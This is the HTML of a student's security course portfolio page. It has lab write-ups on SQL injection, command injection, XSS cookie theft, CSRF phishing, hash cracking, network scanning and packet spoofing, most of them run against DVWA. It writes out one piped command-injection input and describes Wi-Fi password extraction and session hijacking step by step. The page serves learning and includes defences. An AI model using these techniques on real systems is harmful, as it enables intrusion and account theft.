          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
